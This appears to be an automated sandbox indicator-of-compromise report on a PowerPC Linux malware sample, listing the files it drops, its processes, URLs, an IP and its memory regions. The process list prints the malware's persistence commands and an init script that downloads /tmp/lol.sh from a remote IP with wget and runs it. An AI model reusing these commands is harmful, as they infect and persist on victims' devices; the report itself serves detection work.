IOC Report
powerpc.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
powerpc.nn.elf
ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
initial sample
malicious
/etc/init.d/powerpc.nn.elf
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
malicious
/etc/profile
ASCII text
dropped
malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.nxFfay (deleted)
data
dropped

Processes

Path
Cmdline
Malicious
/tmp/powerpc.nn.elf
/tmp/powerpc.nn.elf
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/powerpc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting powerpc.nn.elf'\n /tmp/powerpc.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping powerpc.nn.elf'\n killall powerpc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/powerpc.nn.elf"
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/powerpc.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/powerpc.nn.elf
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf
/tmp/powerpc.nn.elf
-
/tmp/powerpc.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
There are 27 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
unknown
http://94.156.227.233/
unknown

IPs

IP
Domain
Country
Malicious
94.156.227.234
unknown
Bulgaria

Memdumps

Base Address
Regiontype
Protect
Malicious
7f3150016000
page execute read
malicious
7f324771d000
page read and write
55d5c9c33000
page execute read
7f3246896000
page read and write
7f315002c000
page read and write
7f3247099000
page read and write
7f3240000000
page read and write
7f3247bde000
page read and write
55d5c9ebe000
page read and write
55d5cbebc000
page execute and read and write
55d5c9eb6000
page read and write
7f32476f8000
page read and write
7ffddfcdf000
page read and write
7f3247b91000
page read and write
55d5cbed2000
page read and write
7f3247a68000
page read and write
55d5cd5fa000
page read and write
7f3247336000
page read and write
7f3240021000
page read and write
7ffddfddf000
page execute read
7f3150027000
page read and write
7f3247b99000
page read and write
7f32470a7000
page read and write
There are 13 hidden memdumps, click here to show them.